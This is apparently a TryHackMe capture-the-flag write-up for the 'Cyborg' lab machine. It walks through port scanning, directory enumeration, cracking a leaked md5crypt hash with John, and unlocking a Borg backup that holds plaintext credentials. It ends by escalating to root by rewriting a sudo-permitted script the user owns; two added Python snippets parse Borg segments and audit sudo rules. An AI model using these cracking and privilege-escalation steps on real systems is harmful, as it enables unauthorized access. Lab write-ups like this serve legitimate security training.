This is a writeup for Cyborg on TryHackMe


The basics

As per usual, I'm going to write down the easy stuff and omit the answers. However, I'm going to skip the first three questions and go directly for compromising the system. Oh, I forgot one thing, though: aside from the usual arsenal that Kali provides, we'll need to install something called 'borgbackup'. You'll understand why soon enough.

Tasks

#1 What is the user.txt flag?

Okay, to begin with let's throw in the obligatory Nmap scan:

$ nmap -sC -sV -oN nmap/initial <ip>
Nmap scan report for <ip>
Host is up (0.062s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Okay, so we get ports 22 and 80 open. Let's ignore SSH for now and see what port 80 is hiding... We bust out our beloved go/dirbuster and take a peek:

$ gobuster dir -u http://10.10.101.55/ -w /usr/share/wordlists/dirb/common.txt -x py,php

And we get...

[...]
/admin (Status: 301)
/etc (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)

Huh. /admin and /etc. Neat!

Okay, so... /admin reveals a simple blog page that, after a quick examination, doesn't reveal much of anything: just a simple page that isn't powered by WordPress. Maybe a dead end? A closer examination, however, gives us a link to archive.tar. Let's download it and see if we can use it.

$ wget <ip>/admin/archive.tar

and un-tar it with a quick 'tar -xf archive.tar', then look through the folders.

Looking closer at one of the numbered files gives us this:

home/field/dev/final_archive/data/0$ xxd -c8 1
00000000: 424f 5247 5f53 4547  BORG_SEG
00000008: 40f4 3c25 0900 0000  @.<%....
00000010: 02                   .

What the heck is a BORG_SEG file? A quick Google search reveals that it belongs to an archival tool named Borg (the 'borgbackup' package mentioned at the start). Okay. So, let's see what's in it!
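Before handing the files to Borg, it's worth being able to recognise the segment format by hand. The following parser is an added example, not code from the original writeup or from the Borg project; the layout it assumes (8-byte `BORG_SEG` magic, then entries of `<crc32><size><tag>[chunk id][payload]`, little-endian, with `size` covering the whole entry and the crc covering everything after the crc field) is my reading of Borg's repository.py, and both sample blobs are constructed here, the first from the xxd dump above.

```python
import struct
import zlib

# Assumed layout (Borg's repository.py): 8-byte magic, then entries of
# <crc32:4><size:4><tag:1>[chunk id:32][payload], little-endian. `size` counts the
# whole entry including the crc field; the crc covers everything after it.
MAGIC = b"BORG_SEG"
HEADER = struct.Struct("<IIB")        # crc, size, tag             (9 bytes: a bare COMMIT)
KEYED = struct.Struct("<IIB32s")      # same plus 32-byte chunk id (41 bytes: PUT/DELETE)
TAGS = {0: "PUT", 1: "DELETE", 2: "COMMIT"}


def parse_segment(blob):
    """Return one dict per entry, verifying each crc; raise ValueError if malformed."""
    if not blob.startswith(MAGIC):
        raise ValueError("not a Borg segment file (bad magic)")
    entries, pos = [], len(MAGIC)
    while pos < len(blob):
        if pos + HEADER.size > len(blob):
            raise ValueError(f"truncated entry header at offset {pos}")
        crc, size, tag = HEADER.unpack_from(blob, pos)
        if size < HEADER.size or pos + size > len(blob):
            raise ValueError(f"bad entry size {size} at offset {pos}")
        body = blob[pos + 4:pos + size]                      # size + tag [+ id + payload]
        entry = {"offset": pos, "tag": TAGS.get(tag, f"unknown({tag})"), "size": size,
                 "crc_ok": (zlib.crc32(body) & 0xFFFFFFFF) == crc}
        if tag in (0, 1):                                    # PUT / DELETE carry a chunk id
            if size < KEYED.size:
                raise ValueError(f"keyed entry too short at offset {pos}")
            entry["chunk_id"] = blob[pos + HEADER.size:pos + KEYED.size].hex()
            entry["payload_len"] = size - KEYED.size
        entries.append(entry)
        pos += size
    return entries


def make_entry(tag, chunk_id=b"", payload=b""):
    """Build an entry the way the layout above describes (crc over size+tag+id+payload)."""
    body = struct.pack("<IB", HEADER.size + len(chunk_id) + len(payload), tag) + chunk_id + payload
    return struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF) + body


# Constructed sample 1: the 17 bytes from the xxd dump above (a lone COMMIT entry).
XXD_SAMPLE = bytes.fromhex("424f52475f534547" "40f43c2509000000" "02")
# Constructed sample 2: one PUT of a 5-byte chunk followed by a COMMIT, built with make_entry.
CONSTRUCTED = MAGIC + make_entry(0, b"\x11" * 32, b"hello") + make_entry(2)
```

Run `parse_segment(open("data/0/1", "rb").read())` on a real segment file to list its entries; a repository whose segments end in anything but a COMMIT was written incompletely.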

home/field/dev/final_archive$ borg info --last 5 /home/by7e_/ctf/thm/cyborg/home/field/dev/final_archive/
Enter passphrase for key home/field/dev/final_archive:

Rats. We don't have a password.

Yet

We still have an undiscovered item on the site... Stuff that's dwelling in /etc. Let's look at that one...

Closer examination of the folder itself tells us it's a Squid (mis)configuration. We can find a passwd file in the folder, and it looks like it holds a shadow-style password hash. Since we don't have the matching /etc/passwd entry, let's make a fake one so unshadow has something to combine!

$ echo "music_archive:x:1000:1000:music_archive,,,:/home/music_archive:/bin/bash" > passwd

$ echo "music_archive:[redacted]" > shadow

And with that...

$ unshadow passwd shadow > crackme.pwd

With that ready, we feed the file to our hungry John.

$ john crackme.pwd --wordlist=/path/to/your/rockyou/list

And --

Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 SSE2 4x3])
[redacted]        (music_archive)
Session completed

Got em!

A quick test against the server's SSH tells us these credentials are invalid for it. But we have something else to try them against, right?

home/field/dev/final_archive$ borg info --last 5 home/field/dev/final_archive/
Enter passphrase for key home/field/dev/final_archive:

And...

Enter passphrase for key /home/by7e_/ctf/thm/cyborg/home/field/dev/final_archive:
Archive name: music_archive
Archive fingerprint: f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82
Comment:
Hostname: ubuntu
Username: root
Time (start): Tue, 2020-12-29 15:00:38
Time (end): Tue, 2020-12-29 15:00:38
Duration: 0.14 seconds
Number of files: 97
Command line: ./borg create /home/field/dev/final_archive::music_archive /home/alex
Utilization of maximum supported archive size: 0%
------------------------------------------------------------------------------
                       Original size      Compressed size    Deduplicated size
This archive:                1.49 MB              1.49 MB              1.50 MB
All archives:                1.52 MB              1.50 MB              1.50 MB

                       Unique chunks         Total chunks
Chunk index:                      99                   99

Got em! Um... x2. Yeah! That's it!

So!

$ borg extract home/field/dev/final_archive::music_archive
Enter passphrase for key home/field/dev/final_archive:

gives us... a lot more files to work with. Great. A quick find gives us a few interesting files to look at:

home/alex$ find .
[...]
./Documents
./Documents/note.txt
[...]
./Desktop
./Desktop/secret.txt
./.bashrc
./.bash_logout
./.profile

Secret, huh?

home/alex$ cat ./Desktop/secret.txt
shoutout to all the people who have gotten to this stage whoop whoop!"

... clever...

HOWEVER --

home/alex$ cat ./Documents/note.txt
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

alex:[expunged]

Nice. And a quick ssh with those credentials gives us access to the machine, and a

home/alex$ cat user.txt

gives us

[nope.pcx]

Great! One down, one to go!


#2 What is the root.txt flag?

Hm... A quick ps -aux reveals nothing special to us: no service running that we could leverage to gain root. What about...

$ sudo -l
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh

We check the ownership of the file with

alex@ubuntu:~$ ls -al /etc/mp3backups/backup.sh
-r-xr-xr-- 1 alex alex 1083 Dec 30 01:48 /etc/mp3backups/backup.sh

Ha! We are the owner! This will be super easy! With a quick nano /etc/mp3backups/backup.sh we change the contents of the file to

#!/bin/bash
/bin/bash -c bash

exit

We save, and... Permission denied? What?

Oh, oops. The file is mode r-xr-xr--, so even the owner has no write permission. Being the owner, though, we can change that:

$ chmod 777 /etc/mp3backups/backup.sh

We retry editing and run it, and -- we're root!
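The root cause is a sudo rule whose NOPASSWD target is owned (and therefore chmod-able) by the very user allowed to run it. As an added example, not from the original post, here is a small audit that parses the `sudo -l` layout shown above and flags NOPASSWD programs, or their parent directories, that are not root-owned or are group/world writable; the regex and the section detection are my assumptions about the `sudo -l` format, and the sample text is the rule section from this post.

```python
import os
import re
import stat

# One rule line of the "may run the following commands" section, e.g. "(ALL : ALL) NOPASSWD: /etc/x.sh"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")


def parse_sudo_l(text):
    """Return (runas, tags, program) triples from the 'may run' section; arguments are dropped."""
    rules, in_rules = [], False
    for line in text.splitlines():
        in_rules = in_rules or "may run the following commands" in line
        m = RULE_RE.match(line) if in_rules else None
        if m:
            tags = [t.strip() for t in m["tags"].split(":") if t.strip()]
            rules += [(m["runas"].strip(), tags, c.split()[0]) for c in m["cmds"].split(",") if c.split()]
    return rules


def weaknesses(uid, mode):
    """Owner/permission problems for one stat() result (pure, so it is testable without files)."""
    found = []
    if uid != 0:
        found.append(f"owned by uid {uid}, not root")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        found.append("writable by group/others (mode %o)" % stat.S_IMODE(mode))
    return found


def audit(text):
    """Map each NOPASSWD program to the problems found on it and on its parent directory."""
    report = {}
    for _runas, tags, cmd in parse_sudo_l(text):
        if "NOPASSWD" not in tags or not cmd.startswith("/"):
            continue  # password-protected rules and keywords such as ALL are out of scope here
        problems = []
        for path in (cmd, os.path.dirname(cmd)):
            st = os.stat(path) if os.path.exists(path) else None
            problems += ([f"{path}: {w}" for w in weaknesses(st.st_uid, st.st_mode)] if st
                         else [f"{path}: missing (creatable by whoever can write the parent)"])
        report[cmd] = problems
    return report


# Constructed sample: the rule section of the sudo -l output from this post.
SAMPLE = r"""Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
"""
```

On the box itself, `audit(subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout)` would report backup.sh as owned by uid 1000; the fix is root ownership of the script and its directory, with mode 755 or stricter.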

A quick

$ cat /root/root.txt

gives us

[dramatic-look.qt]

And that's it!

- by7e_